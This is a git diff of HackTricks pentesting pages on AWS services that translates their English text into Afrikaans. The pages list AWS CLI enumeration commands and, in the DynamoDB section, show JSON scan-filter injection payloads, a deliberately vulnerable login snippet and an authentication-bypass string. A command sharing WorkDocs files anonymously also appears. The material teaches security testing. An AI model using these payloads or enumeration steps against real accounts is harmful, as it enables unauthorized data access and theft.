-You can find a guide here: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html)
+Jy kan 'n gids hier vind: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html)
 
 ### ~~Sharing AD (from attacker to victim)~~
 
-It doesn't look like possible to grant AWS access to users from a different AD env to one AWS account.
+Dit lyk nie moontlik om AWS-toegang aan gebruikers van 'n ander AD-omgewing te gee nie, na een AWS-rekening.
 
 ## WorkDocs
 
-Amazon Web Services (AWS) WorkDocs is a cloud-based **file storage and sharing service**. It is part of the AWS suite of cloud computing services and is designed to provide a secure and scalable solution for organizations to store, share, and collaborate on files and documents.
+Amazon Web Services (AWS) WorkDocs is 'n wolk-gebaseerde **lêeropslag en deel diens**. Dit is deel van die AWS-suite van wolkrekenaarsdienste en is ontwerp om 'n veilige en skaalbare oplossing te bied vir organisasies om lêers en dokumente te stoor, te deel en saam te werk.
 
-AWS WorkDocs provides a web-based interface for users to upload, access, and manage their files and documents. It also offers features such as version control, real-time collaboration, and integration with other AWS services and third-party tools.
+AWS WorkDocs bied 'n web-gebaseerde koppelvlak vir gebruikers om hul lêers en dokumente op te laai, toegang te verkry en te bestuur. Dit bied ook funksies soos weergawebeheer, regstreekse samewerking, en integrasie met ander AWS-dienste en derdeparty gereedskap.
 
 ### Enumeration
-
 ```bash
 # Get AD users (Admin not included)
 aws workdocs describe-users --organization-id <directory-id>
@@ -109,7 +106,6 @@ aws workdocs describe-resource-permissions --resource-id <value>
 aws workdocs add-resource-permissions --resource-id <id> --principals Id=anonymous,Type=ANONYMOUS,Role=VIEWER
 ## This will give an id, the file will be acesible in: https://<name>.awsapps.com/workdocs/index.html#/share/document/<id>
 ```
-
 ### Privesc
 
 {{#ref}}
@@ -117,7 +113,3 @@ aws workdocs add-resource-permissions --resource-id <id> --principals Id=anonymo
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md
index caf35d03c..96f537353 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md
@@ -4,10 +4,9 @@
 
 ## DocumentDB
 
-Amazon DocumentDB, offering compatibility with MongoDB, is presented as a **fast, reliable, and fully managed database service**. Designed for simplicity in deployment, operation, and scalability, it allows the **seamless migration and operation of MongoDB-compatible databases in the cloud**. Users can leverage this service to execute their existing application code and utilize familiar drivers and tools, ensuring a smooth transition and operation akin to working with MongoDB.
+Amazon DocumentDB, wat kompatibiliteit met MongoDB bied, word aangebied as 'n **vinnige, betroubare en volledig bestuurde databasediens**. Ontwerp vir eenvoud in implementering, werking en skaalbaarheid, dit stel gebruikers in staat om die **naadlose migrasie en werking van MongoDB-kompatible databases in die wolk** te doen. Gebruikers kan hierdie diens benut om hul bestaande toepassingskode uit te voer en bekende bestuurders en gereedskap te gebruik, wat 'n gladde oorgang en werking soos met MongoDB verseker.
 
 ### Enumeration
-
 ```bash
 aws docdb describe-db-clusters # Get username from "MasterUsername", get also the endpoint from "Endpoint"
 aws docdb describe-db-instances #Get hostnames from here
@@ -20,10 +19,9 @@ aws docdb describe-db-cluster-parameters --db-cluster-parameter-group-name <para
 aws docdb describe-db-cluster-snapshots
 aws --region us-east-1 --profile ad docdb describe-db-cluster-snapshot-attributes --db-cluster-snapshot-identifier <snap_id>
 ```
-
 ### NoSQL Injection
 
-As DocumentDB is a MongoDB compatible database, you can imagine it's also vulnerable to common NoSQL injection attacks:
+Aangesien DocumentDB 'n MongoDB-ondersteunde databasis is, kan jy jou voorstel dat dit ook kwesbaar is vir algemene NoSQL-inspuitaanvalle:
 
 {{#ref}}
 https://book.hacktricks.xyz/pentesting-web/nosql-injection
@@ -40,7 +38,3 @@ https://book.hacktricks.xyz/pentesting-web/nosql-injection
 - [https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/](https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md
index cb0864715..ab95e7d8d 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md
@@ -4,30 +4,29 @@
 
 ## DynamoDB
 
-### Basic Information
+### Basiese Inligting
 
-Amazon DynamoDB is presented by AWS as a **fully managed, serverless, key-value NoSQL database**, tailored for powering high-performance applications regardless of their size. The service ensures robust features including inherent security measures, uninterrupted backups, automated replication across multiple regions, integrated in-memory caching, and convenient data export utilities.
+Amazon DynamoDB word deur AWS aangebied as 'n **volledig bestuurde, serverless, sleutel-waarde NoSQL-databasis**, ontwerp om hoë-prestasie toepassings te ondersteun, ongeag hul grootte. Die diens verseker robuuste kenmerke, insluitend ingeboude sekuriteitsmaatreëls, ononderbroken rugsteun, geoutomatiseerde replikaasies oor verskeie streke, geïntegreerde in-geheue kas, en gerieflike data-uitvoerhulpmiddels.
 
-In the context of DynamoDB, instead of establishing a traditional database, **tables are created**. Each table mandates the specification of a **partition key** as an integral component of the **table's primary key**. This partition key, essentially a **hash value**, plays a critical role in both the retrieval of items and the distribution of data across various hosts. This distribution is pivotal for maintaining both scalability and availability of the database. Additionally, there's an option to incorporate a **sort key** to further refine data organization.
+In die konteks van DynamoDB, in plaas daarvan om 'n tradisionele databasis op te stel, **word tafels geskep**. Elke tafel vereis die spesifikasie van 'n **partisie-sleutel** as 'n integrale komponent van die **tafel se primêre sleutel**. Hierdie partisiesleutel, wat essensieel 'n **hash-waarde** is, speel 'n kritieke rol in beide die herwinning van items en die verspreiding van data oor verskeie gasheers. Hierdie verspreiding is van kardinale belang om beide skaalbaarheid en beskikbaarheid van die databasis te handhaaf. Daar is ook 'n opsie om 'n **sorteersleutel** in te sluit om data-organisasie verder te verfyn.
 
-### Encryption
+### Enkripsie
 
-By default, DynamoDB uses a KMS key that \*\*belongs to Amazon DynamoDB,\*\*not even the AWS managed key that at least belongs to your account.
+Standaard gebruik DynamoDB 'n KMS-sleutel wat \*\*aan Amazon DynamoDB behoort,\*\* nie eens die AWS bestuurde sleutel wat ten minste aan jou rekening behoort nie.
 
 <figure><img src="https://lh4.googleusercontent.com/JjtNS7aA-_GRMgZb4v93jWEQJi6DQdUPq0FEpzZPdeyCeNoG05p0NJiV9Zs-ULs_-Tfjmx0W1ZgsE2Ui2ljo7D-1a87Xny-gpLVQO0XmXdFoph9ci1RepbVNwaCe9oPruEZSEDxGTxF5dIv6pW1WpT6kWA=s2048" alt=""><figcaption></figcaption></figure>
 
-### Backups & Export to S3
+### Rugsteun & Uitvoer na S3
 
-It's possible to **schedule** the generation of **table backups** or create them on **demand**. Moreover, it's also possible to enable **Point-in-time recovery (PITR) for a table.** Point-in-time recovery provides continuous **backups** of your DynamoDB data for **35 days** to help you protect against accidental write or delete operations.
+Dit is moontlik om die generering van **tafelrugsteun** te **skeduleer** of dit op **aanvraag** te skep. Boonop is dit ook moontlik om **Punt-in-tyd herstel (PITR) vir 'n tafel** in te skakel. Punt-in-tyd herstel bied deurlopende **rugsteun** van jou DynamoDB-data vir **35 dae** om jou te help beskerm teen per ongeluk skryf- of verwyderingsoperasies.
 
-It's also possible to export **the data of a table to S3**, but the table needs to have **PITR enabled**.
+Dit is ook moontlik om **die data van 'n tafel na S3 uit te voer**, maar die tafel moet **PITR geaktiveer** hê.
 
 ### GUI
 
-There is a GUI for local Dynamo services like [DynamoDB Local](https://aws.amazon.com/blogs/aws/dynamodb-local-for-desktop-development/), [dynalite](https://github.com/mhart/dynalite), [localstack](https://github.com/localstack/localstack), etc, that could be useful: [https://github.com/aaronshaf/dynamodb-admin](https://github.com/aaronshaf/dynamodb-admin)
-
-### Enumeration
+Daar is 'n GUI vir plaaslike Dynamo-dienste soos [DynamoDB Local](https://aws.amazon.com/blogs/aws/dynamodb-local-for-desktop-development/), [dynalite](https://github.com/mhart/dynalite), [localstack](https://github.com/localstack/localstack), ens., wat nuttig kan wees: [https://github.com/aaronshaf/dynamodb-admin](https://github.com/aaronshaf/dynamodb-admin)
 
+### Enumerasie
 ```bash
 # Tables
 aws dynamodb list-tables
@@ -36,7 +35,7 @@ aws dynamodb describe-table --table-name <t_name> #Get metadata info
 
 #Check if point in time recovery is enabled
 aws dynamodb describe-continuous-backups \
-  --table-name tablename
+--table-name tablename
 
 # Backups
 aws dynamodb list-backups
@@ -54,129 +53,112 @@ aws dynamodb describe-export --export-arn <arn>
 # Misc
 aws dynamodb describe-endpoints #Dynamodb endpoints
 ```
-
-### Unauthenticated Access
+### Ongeauthentiseerde Toegang
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md
 {{#endref}}
 
-### Privesc
+### Privilege Verhoging
 
 {{#ref}}
 ../aws-privilege-escalation/aws-dynamodb-privesc.md
 {{#endref}}
 
-### Post Exploitation
+### Post Exploitatie
 
 {{#ref}}
 ../aws-post-exploitation/aws-dynamodb-post-exploitation.md
 {{#endref}}
 
-### Persistence
+### Volharding
 
 {{#ref}}
 ../aws-persistence/aws-dynamodb-persistence.md
 {{#endref}}
 
-## DynamoDB Injection
+## DynamoDB Inspuiting
 
-### SQL Injection
+### SQL Inspuiting
 
-There are ways to access DynamoDB data with **SQL syntax**, therefore, typical **SQL injections are also possible**.
+Daar is maniere om toegang tot DynamoDB-data te verkry met **SQL-sintaksis**, daarom is tipiese **SQL-inspuitings ook moontlik**.
 
 {{#ref}}
 https://book.hacktricks.xyz/pentesting-web/sql-injection
 {{#endref}}
 
-### NoSQL Injection
+### NoSQL Inspuiting
 
-In DynamoDB different **conditions** can be used to retrieve data, like in a common NoSQL Injection if it's possible to **chain more conditions to retrieve** data you could obtain hidden data (or dump the whole table).\
-You can find here the conditions supported by DynamoDB: [https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html)
+In DynamoDB kan verskillende **voorwaardes** gebruik word om data te verkry, soos in 'n algemene NoSQL-inspuiting. As dit moontlik is om **meer voorwaardes te koppel om** data te verkry, kan jy verborge data verkry (of die hele tabel dump).\
+Jy kan hier die voorwaardes vind wat deur DynamoDB ondersteun word: [https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html)
 
-Note that **different conditions** are supported if the data is being accessed via **`query`** or via **`scan`**.
+Let daarop dat **verskillende voorwaardes** ondersteun word as die data via **`query`** of via **`scan`** verkry word.
 
 > [!NOTE]
-> Actually, **Query** actions need to specify the **condition "EQ" (equals)** in the **primary** key to works, making it much **less prone to NoSQL injections** (and also making the operation very limited).
-
-If you can **change the comparison** performed or add new ones, you could retrieve more data.
+> Trouens, **Query** aksies moet die **voorwaarde "EQ" (gelyk)** in die **primêre** sleutel spesifiseer om te werk, wat dit baie **minder geneig maak tot NoSQL-inspuitings** (en ook die operasie baie beperk maak).
 
+As jy die **vergelyking** wat uitgevoer word kan **verander** of nuwe kan byvoeg, kan jy meer data verkry.
 ```bash
 # Comparators to dump the database
 "NE": "a123" #Get everything that doesn't equal "a123"
 "NOT_CONTAINS": "a123" #What you think
 "GT": " " #All strings are greater than a space
 ```
-
 {{#ref}}
 https://book.hacktricks.xyz/pentesting-web/nosql-injection
 {{#endref}}
 
-### Raw Json injection
+### Rauwe Json-inspuiting
 
 > [!CAUTION]
-> **This vulnerability is based on dynamodb Scan Filter which is now deprecated!**
+> **Hierdie kwesbaarheid is gebaseer op dynamodb Scan Filter wat nou verouderd is!**
 
-**DynamoDB** accepts **Json** objects to **search** for data inside the DB. If you find that you can write in the json object sent to search, you could make the DB dump, all the contents.
-
-For example, injecting in a request like:
+**DynamoDB** aanvaar **Json**-objekte om **data** binne die DB te **soek**. As jy vind dat jy in die json-objek wat gestuur word om te soek, kan skryf, kan jy die DB dump, al die inhoud. 
 
+Byvoorbeeld, inspuiting in 'n versoek soos:
 ```bash
 '{"Id": {"ComparisonOperator": "EQ","AttributeValueList": [{"N": "' + user_input + '"}]}}'
 ```
-
-an attacker could inject something like:
+'n aanvaller kan iets soos injecteer:
 
 `1000"}],"ComparisonOperator": "GT","AttributeValueList": [{"N": "0`
 
-fix the "EQ" condition searching for the ID 1000 and then looking for all the data with a Id string greater and 0, which is all.
-
-Another **vulnerable example using a login** could be:
+regstel die "EQ" voorwaarde wat soek na die ID 1000 en dan soek na al die data met 'n Id-string groter as 0, wat alles is.
 
+Nog 'n **kwetsbare voorbeeld wat 'n aanmelding gebruik** kan wees:
 ```python
 scan_filter = """{
-    "username": {
-        "ComparisonOperator": "EQ",
-        "AttributeValueList": [{"S": "%s"}]
-    },
-    "password": {
-        "ComparisonOperator": "EQ",
-        "AttributeValueList": [{"S": "%s"}]
-    }
+"username": {
+"ComparisonOperator": "EQ",
+"AttributeValueList": [{"S": "%s"}]
+},
+"password": {
+"ComparisonOperator": "EQ",
+"AttributeValueList": [{"S": "%s"}]
+}
 }
 """ % (user_data['username'], user_data['password'])
 
 dynamodb.scan(TableName="table-name", ScanFilter=json.loads(scan_filter))
 ```
-
-This would be vulnerable to:
-
+Dit sou kwesbaar wees vir:
 ```
 username: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none
 password: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none
 ```
-
 ### :property Injection
 
-Some SDKs allows to use a string indicating the filtering to be performed like:
-
+Sommige SDK's laat 'n string toe wat die filtrering aandui wat uitgevoer moet word, soos:
 ```java
 new ScanSpec().withProjectionExpression("UserName").withFilterExpression(user_input+" = :username and Password = :password").withValueMap(valueMap)
 ```
+U moet weet dat soek in DynamoDB vir **substitusie** van 'n attribuut **waarde** in **filteruitdrukkings** terwyl die items gescan word, die tokens moet **begin** met die **`:`** karakter. Sulke tokens sal **vervang** word met die werklike **attribuutwaarde tydens uitvoering**.
 
-You need to know that searching in DynamoDB for **substituting** an attribute **value** in **filter expressions** while scanning the items, the tokens should **begin** with the **`:`** character. Such tokens will be **replaced** with actual **attribute value at runtime**.
-
-Therefore, a login like the previous one can be bypassed with something like:
-
+Daarom kan 'n aanmelding soos die vorige omseil word met iets soos:
 ```bash
 :username = :username or :username
 # This will generate the query:
 # :username = :username or :username = :username and Password = :password
 # which is always true
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md
index f365bc7f5..1443115a1 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md
@@ -4,7 +4,7 @@
 
 ## VPC & Networking
 
-Learn what a VPC is and about its components in:
+Leer wat 'n VPC is en oor sy komponente in:
 
 {{#ref}}
 aws-vpc-and-networking-basic-information.md
@@ -12,37 +12,36 @@ aws-vpc-and-networking-basic-information.md
 
 ## EC2
 
-Amazon EC2 is utilized for initiating **virtual servers**. It allows for the configuration of **security** and **networking** and the management of **storage**. The flexibility of Amazon EC2 is evident in its ability to scale resources both upwards and downwards, effectively adapting to varying requirement changes or surges in popularity. This feature diminishes the necessity for precise traffic predictions.
+Amazon EC2 word gebruik om **virtuele bedieners** te begin. Dit stel die konfigurasie van **sekuriteit** en **netwerk** en die bestuur van **berging** moontlik. Die buigsaamheid van Amazon EC2 is duidelik in sy vermoë om hulpbronne opwaarts en afwaarts te skaal, wat effektief aanpas by verskillende vereiste veranderinge of toename in gewildheid. Hierdie kenmerk verminder die noodsaaklikheid vir presiese verkeersvoorspellings.
 
-Interesting things to enumerate in EC2:
+Interessante dinge om in EC2 te enumereer:
 
-- Virtual Machines
-  - SSH Keys
-  - User Data
-  - Existing EC2s/AMIs/Snapshots
-- Networking
-  - Networks
-  - Subnetworks
-  - Public IPs
-  - Open ports
-- Integrated connections with other networks outside AWS
+- Virtuele Masjiene
+- SSH Sleutels
+- Gebruikersdata
+- Bestaande EC2s/AMIs/Snapshots
+- Netwerk
+- Netwerke
+- Subnetwerke
+- Publieke IPs
+- Oop poorte
+- Geïntegreerde verbindings met ander netwerke buite AWS
 
 ### Instance Profiles
 
-Using **roles** to grant permissions to applications that run on **EC2 instances** requires a bit of extra configuration. An application running on an EC2 instance is abstracted from AWS by the virtualized operating system. Because of this extra separation, you need an additional step to assign an AWS role and its associated permissions to an EC2 instance and make them available to its applications.
+Om **rolle** te gebruik om toestemmings aan toepassings wat op **EC2-instances** loop te verleen, vereis 'n bietjie ekstra konfigurasie. 'n Toepassing wat op 'n EC2-instance loop, is geabstraheer van AWS deur die gevirtualiseerde bedryfstelsel. As gevolg van hierdie ekstra skeiding, benodig jy 'n bykomende stap om 'n AWS-rol en sy geassosieerde toestemmings aan 'n EC2-instance toe te ken en dit beskikbaar te maak vir sy toepassings.
 
-This extra step is the **creation of an** [_**instance profile**_](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html) attached to the instance. The **instance profile contains the role and** can provide the role's temporary credentials to an application that runs on the instance. Those temporary credentials can then be used in the application's API calls to access resources and to limit access to only those resources that the role specifies. Note that **only one role can be assigned to an EC2 instance** at a time, and all applications on the instance share the same role and permissions.
+Hierdie ekstra stap is die **skepping van 'n** [_**instance profile**_](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html) wat aan die instance geheg is. Die **instance profile bevat die rol en** kan die rol se tydelike akrediteerings aan 'n toepassing wat op die instance loop, verskaf. Daardie tydelike akrediteerings kan dan in die toepassing se API-oproepe gebruik word om toegang tot hulpbronne te verkry en om toegang te beperk tot slegs daardie hulpbronne wat die rol spesifiseer. Let daarop dat **slegs een rol aan 'n EC2-instance** op 'n slag toegeken kan word, en alle toepassings op die instance deel dieselfde rol en toestemmings.
 
 ### Metadata Endpoint
 
-AWS EC2 metadata is information about an Amazon Elastic Compute Cloud (EC2) instance that is available to the instance at runtime. This metadata is used to provide information about the instance, such as its instance ID, the availability zone it is running in, the IAM role associated with the instance, and the instance's hostname.
+AWS EC2 metadata is inligting oor 'n Amazon Elastic Compute Cloud (EC2) instance wat beskikbaar is vir die instance tydens uitvoering. Hierdie metadata word gebruik om inligting oor die instance te verskaf, soos sy instance ID, die beskikbaarheidsone waarin dit loop, die IAM-rol wat met die instance geassosieer is, en die instance se gasheernaam.
 
 {{#ref}}
 https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
 {{#endref}}
 
 ### Enumeration
-
 ```bash
 # Get EC2 instances
 aws ec2 describe-instances
@@ -50,10 +49,10 @@ aws ec2 describe-instance-status #Get status from running instances
 
 # Get user data from each ec2 instance
 for instanceid in $(aws ec2 describe-instances --profile <profile> --region us-west-2 | grep -Eo '"i-[a-zA-Z0-9]+' | tr -d '"'); do
-  echo "Instance ID: $instanceid"
-  aws ec2 describe-instance-attribute --profile <profile> --region us-west-2 --instance-id "$instanceid" --attribute userData | jq ".UserData.Value" | tr -d '"' | base64 -d
-  echo ""
-  echo "-------------------"
+echo "Instance ID: $instanceid"
+aws ec2 describe-instance-attribute --profile <profile> --region us-west-2 --instance-id "$instanceid" --attribute userData | jq ".UserData.Value" | tr -d '"' | base64 -d
+echo ""
+echo "-------------------"
 done
 
 # Instance profiles
@@ -128,16 +127,15 @@ aws ec2 describe-route-tables
 aws ec2 describe-vpcs
 aws ec2 describe-vpc-peering-connections
 ```
-
-### Unauthenticated Access
+### Ongeauthentiseerde Toegang
 
 {{#ref}}
 ../../aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md
 {{#endref}}
 
-### Privesc
+### Privilege Escalation
 
-In the following page you can check how to **abuse EC2 permissions to escalate privileges**:
+In die volgende bladsy kan jy kyk hoe om **EC2-toestemmings te misbruik om voorregte te verhoog**:
 
 {{#ref}}
 ../../aws-privilege-escalation/aws-ec2-privesc.md
@@ -151,17 +149,17 @@ In the following page you can check how to **abuse EC2 permissions to escalate p
 
 ## EBS
 
-Amazon **EBS** (Elastic Block Store) **snapshots** are basically static **backups** of AWS EBS volumes. In other words, they are **copies** of the **disks** attached to an **EC2** Instance at a specific point in time. EBS snapshots can be copied across regions and accounts, or even downloaded and run locally.
+Amazon **EBS** (Elastic Block Store) **snapshots** is basies statiese **rugsteun** van AWS EBS volumes. Met ander woorde, dit is **kopieë** van die **skywe** wat aan 'n **EC2** instansie op 'n spesifieke tydstip geheg is. EBS snapshots kan oor streke en rekeninge gekopieer word, of selfs afgelaai en plaaslik uitgevoer word.
 
-Snapshots can contain **sensitive information** such as **source code or APi keys**, therefore, if you have the chance, it's recommended to check it.
+Snapshots kan **sensitiewe inligting** soos **bronkode of API sleutels** bevat, daarom, as jy die kans het, word dit aanbeveel om dit na te gaan.
 
-### Difference AMI & EBS
+### Verskil tussen AMI & EBS
 
-An **AMI** is used to **launch an EC2 instance**, while an EC2 **Snapshot** is used to **backup and recover data stored on an EBS volume**. While an EC2 Snapshot can be used to create a new AMI, it is not the same thing as an AMI, and it does not include information about the operating system, application server, or other software required to run an application.
+'n **AMI** word gebruik om 'n **EC2 instansie te begin**, terwyl 'n EC2 **Snapshot** gebruik word om **data wat op 'n EBS volume gestoor is, te rugsteun en te herstel**. Terwyl 'n EC2 Snapshot gebruik kan word om 'n nuwe AMI te skep, is dit nie dieselfde as 'n AMI nie, en dit sluit nie inligting oor die bedryfstelsel, toepassingsbediener, of ander sagteware wat benodig word om 'n toepassing te laat werk, in nie.
 
-### Privesc
+### Privilege Escalation
 
-In the following page you can check how to **abuse EBS permissions to escalate privileges**:
+In die volgende bladsy kan jy kyk hoe om **EBS-toestemmings te misbruik om voorregte te verhoog**:
 
 {{#ref}}
 ../../aws-privilege-escalation/aws-ebs-privesc.md
@@ -169,14 +167,13 @@ In the following page you can check how to **abuse EBS permissions to escalate p
 
 ## SSM
 
-**Amazon Simple Systems Manager (SSM)** allows to remotely manage floats of EC2 instances to make their administrations much more easy. Each of these instances need to be running the **SSM Agent service as the service will be the one getting the actions and performing them** from the AWS API.
+**Amazon Simple Systems Manager (SSM)** maak dit moontlik om afstandsgewys 'n vloot van EC2 instansies te bestuur om hul administrasies baie makliker te maak. Elke een van hierdie instansies moet die **SSM Agent diens aan hê, aangesien die diens die een sal wees wat die aksies ontvang en uitvoer** vanaf die AWS API.
 
-**SSM Agent** makes it possible for Systems Manager to update, manage, and configure these resources. The agent **processes requests from the Systems Manager service in the AWS Cloud**, and then runs them as specified in the request.
+**SSM Agent** maak dit moontlik vir Systems Manager om hierdie hulpbronne op te dateer, te bestuur en te konfigureer. Die agent **verwerk versoeke van die Systems Manager diens in die AWS Cloud**, en voer dit dan uit soos gespesifiseer in die versoek.
 
-The **SSM Agent comes**[ **preinstalled in some AMIs**](https://docs.aws.amazon.com/systems-manager/latest/userguide/ami-preinstalled-agent.html) or you need to [**manually install them**](https://docs.aws.amazon.com/systems-manager/latest/userguide/sysman-manual-agent-install.html) on the instances. Also, the IAM Role used inside the instance needs to have the policy **AmazonEC2RoleforSSM** attached to be able to communicate.
-
-### Enumeration
+Die **SSM Agent kom**[ **vooraf geïnstalleer in sommige AMIs**](https://docs.aws.amazon.com/systems-manager/latest/userguide/ami-preinstalled-agent.html) of jy moet dit [**handmatig installeer**](https://docs.aws.amazon.com/systems-manager/latest/userguide/sysman-manual-agent-install.html) op die instansies. Ook, die IAM Rol wat binne die instansie gebruik word, moet die beleid **AmazonEC2RoleforSSM** aangeheg hê om te kan kommunikeer.
 
+### Enumerasie
 ```bash
 aws ssm describe-instance-information
 aws ssm describe-parameters
@@ -185,16 +182,13 @@ aws ssm describe-instance-patches --instance-id <id>
 aws ssm describe-instance-patch-states --instance-ids <id>
 aws ssm describe-instance-associations-status --instance-id <id>
 ```
-
-You can check in an EC2 instance if Systems Manager is runnign just by executing:
-
+U kan in 'n EC2-instansie nagaan of Systems Manager loop deur eenvoudig die volgende uit te voer:
 ```bash
 ps aux | grep amazon-ssm
 ```
-
 ### Privesc
 
-In the following page you can check how to **abuse SSM permissions to escalate privileges**:
+In die volgende bladsy kan jy kyk hoe om **SSM-toestemmings te misbruik om voorregte te verhoog**:
 
 {{#ref}}
 ../../aws-privilege-escalation/aws-ssm-privesc.md
@@ -202,10 +196,9 @@ In the following page you can check how to **abuse SSM permissions to escalate p
 
 ## ELB
 
-**Elastic Load Balancing** (ELB) is a **load-balancing service for Amazon Web Services** (AWS) deployments. ELB automatically **distributes incoming application traffic** and scales resources to meet traffic demands.
+**Elastic Load Balancing** (ELB) is 'n **laaibelastingdiens vir Amazon Web Services** (AWS) ontplooiings. ELB versprei outomaties **inkomende toepassingsverkeer** en skaal hulpbronne om aan verkeersvereistes te voldoen.
 
 ### Enumeration
-
 ```bash
 # List internet-facing ELBs
 aws elb describe-load-balancers
@@ -216,11 +209,9 @@ aws elbv2 describe-load-balancers
 aws elbv2 describe-load-balancers | jq '.LoadBalancers[].DNSName'
 aws elbv2 describe-listeners --load-balancer-arn <load_balancer_arn>
 ```
+## Ontwerp Sjablone & Outomatiese Skaal Groepe
 
-## Launch Templates & Autoscaling Groups
-
-### Enumeration
-
+### Opname
 ```bash
 # Launch templates
 aws ec2 describe-launch-templates
@@ -235,12 +226,11 @@ aws autoscaling describe-launch-configurations
 aws autoscaling describe-load-balancer-target-groups
 aws autoscaling describe-load-balancers
 ```
-
 ## Nitro
 
-AWS Nitro is a suite of **innovative technologies** that form the underlying platform for AWS EC2 instances. Introduced by Amazon to **enhance security, performance, and reliability**, Nitro leverages custom **hardware components and a lightweight hypervisor**. It abstracts much of the traditional virtualization functionality to dedicated hardware and software, **minimizing the attack surface** and improving resource efficiency. By offloading virtualization functions, Nitro allows EC2 instances to deliver **near bare-metal performance**, making it particularly beneficial for resource-intensive applications. Additionally, the Nitro Security Chip specifically ensures the **security of the hardware and firmware**, further solidifying its robust architecture.
+AWS Nitro is 'n suite van **innoverende tegnologieë** wat die onderliggende platform vir AWS EC2-instances vorm. Ingevoerd deur Amazon om **veiligheid, prestasie en betroubaarheid** te **verbeter**, benut Nitro pasgemaakte **hardeware-komponente en 'n liggewig hypervisor**. Dit abstraheer baie van die tradisionele virtualisering funksionaliteit na toegewyde hardeware en sagteware, **minimaliseer die aanvaloppervlak** en verbeter hulpbron doeltreffendheid. Deur virtualisering funksies af te laai, laat Nitro EC2-instances toe om **naby bare-metal prestasie** te lewer, wat dit veral voordelig maak vir hulpbron-intensiewe toepassings. Boonop verseker die Nitro Security Chip spesifiek die **veiligheid van die hardeware en firmware**, wat sy robuuste argitektuur verder versterk.
 
-Get more information and how to enumerate it from:
+Kry meer inligting en hoe om dit te enumereer vanaf:
 
 {{#ref}}
 aws-nitro-enum.md
@@ -248,35 +238,34 @@ aws-nitro-enum.md
 
 ## VPN
 
-A VPN allows to connect your **on-premise network (site-to-site VPN)** or the **workers laptops (Client VPN)** with a **AWS VPC** so services can accessed without needing to expose them to the internet.
+'n VPN laat jou toe om jou **on-premise netwerk (site-to-site VPN)** of die **werkers se skootrekenaars (Client VPN)** met 'n **AWS VPC** te verbind sodat dienste sonder blootstelling aan die internet verkry kan word.
 
-#### Basic AWS VPN Components
+#### Basiese AWS VPN Komponente
 
-1. **Customer Gateway**:
-   - A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection.
-   - It is essentially a physical device or software application on your side of the Site-to-Site VPN connection.
-   - You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway.
-   - It serves as a reference point for setting up the VPN connection and doesn't incur additional charges.
-2. **Virtual Private Gateway**:
-   - A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection.
-   - It is attached to your VPC and serves as the target for your VPN connection.
-   - VPG is the AWS side endpoint for the VPN connection.
-   - It handles the secure communication between your VPC and your on-premises network.
-3. **Site-to-Site VPN Connection**:
-   - A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel.
-   - This type of connection requires a Customer Gateway and a Virtual Private Gateway.
-   - It's used for secure, stable, and consistent communication between your data center or network and your AWS environment.
-   - Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection.
-4. **Client VPN Endpoint**:
-   - A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions.
-   - It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network.
-   - It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks.
-   - With Client VPN, each client device uses a VPN client software to establish a secure connection.
+1. **Kliënt Gateway**:
+- 'n Kliënt Gateway is 'n hulpbron wat jy in AWS skep om jou kant van 'n VPN-verbinding te verteenwoordig.
+- Dit is essensieel 'n fisiese toestel of sagtewaretoepassing aan jou kant van die Site-to-Site VPN-verbinding.
+- Jy verskaf routering inligting en die publieke IP-adres van jou netwerktoestel (soos 'n router of 'n firewall) aan AWS om 'n Kliënt Gateway te skep.
